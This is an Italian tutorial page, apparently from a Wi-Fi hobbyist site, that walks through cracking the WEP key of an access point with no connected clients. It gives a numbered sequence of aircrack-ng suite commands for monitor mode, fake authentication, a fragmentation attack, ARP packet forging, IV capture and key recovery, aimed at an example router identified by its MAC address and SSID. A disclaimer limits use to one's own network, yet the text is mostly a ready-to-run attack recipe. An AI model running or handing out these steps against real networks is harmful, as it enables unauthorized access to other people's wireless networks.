WEP crack senza clients attivi v.1

Questa semplice guida può essere usata nel caso in cui nell'access point/router non ci siano clients collegati.
Questo tipo di attacco può funzionare se l' Access Point/Router è vulnerabile al tipo di attacco "DefragMentation".

INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E' UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E' DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Tutto quello che serve è un pc con una scheda wireless , il CD BackTrack2 , il MAC address dell' access point, il SSID (the network “name”) e il MAC address della vostra wireless card.


Dopo aver fatto il boot da BackTrack2, questi sono i passi da seguire:

1]
Abilitiamo il monitor mode della nostra scheda:

airmon-ng start wifi0 11(dove 11 è il canale su cui l'access point comunica)


2]
Esportiamo in variabili i nostri dati

export ACP=00:14:7F:95:5B:AC < -- Access Point MAC
export WIFI=00:14:51:XX:XX:XX < -- WLAN Card MAC
export SSID=BTHomeHub-1100 < -- SSID of target network


3]
Tiriamo sù l'interfaccia wireless, forziamo nuovamente il monitor mode e ci autentichiamo sull'accesspoint

ifconfig ath0 up
iwconfig ath0 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $ACP -h $WIFI ath0

4]
A questo punto dopo aver ottenuto il messaggio di “Association Successful!” , possiamo avviare l'attacco con aireplay-ng in modalita defragmentation:

aireplay-ng -5 -b $ACP -h $WIFI ath0

5]
A questo punto aspettate finchè non vi viene proposto da aireplay di salvare il pacchetto trovato; vi vhiederà di mantenerlo e voi rispondete "yes";se tutto và bene dopo un pò vi salverà il pacchetto in un file dal nome fragment.xor. Se l'attacco non andrà a buon fine provate con altri pacchetti.

6]
A questo punto potete forgiare il pacchetto salvato in modo da creare un ARP request e di conseguenza usarlo in seguito per creare dati IVS.
Avviate packetforge-ng e salvate il risulato nel file arp-request.

packetforge-ng -0 -a $ACP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request

7]
A questo punto iniziamo a catturare i dati dall'accesspoint:

airodump-ng -c 11 -bssid $ACP –ivs -w cap ath0

8]
In una nuova console mentre airodump cattura dati, inviamo il pachetto con l'arp request appena creato, all'accesspoint.

aireplay-ng -2 -r arp-request ath0

9]
Quando aireplay catteurerà il nostro pacchetto forgiato, rispondiamo "yes" e magicamente inzierà il broadcasting.
Dovremmo vedere le statistiche di pacchetti catturati da airodump incrementare vertiginosamente.

10]
Dopo aver raggiunto circa 100.000 pacchetti di dati apriamo un altra console e avviamo aircrack:

aircrack-ng -b $ACP *.ivs

Si ringrazia DrPepperONE per aver fornito questa ottima guida


Tags Cloud 3D

Bookmarks

Delicious Technorati Furl Yahoo_myweb Google_bmarks Windows_live Digg Newsvine MySocialBookmark Social Bookmark Script 

Supportaci





Aggiungi questo sito ai preferiti
Scegli come Homepage